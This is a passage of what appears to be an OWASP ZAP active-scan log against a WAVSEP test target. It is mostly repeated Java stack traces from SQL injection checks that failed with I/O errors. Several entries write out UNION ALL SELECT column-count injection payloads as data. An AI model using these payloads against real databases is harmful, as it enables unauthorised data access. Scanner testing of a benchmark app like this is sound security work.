org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681008 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681009 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681009 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681010 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681011 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681012 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681013 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681014 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681014 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681016 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681016 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681017 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681018 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at 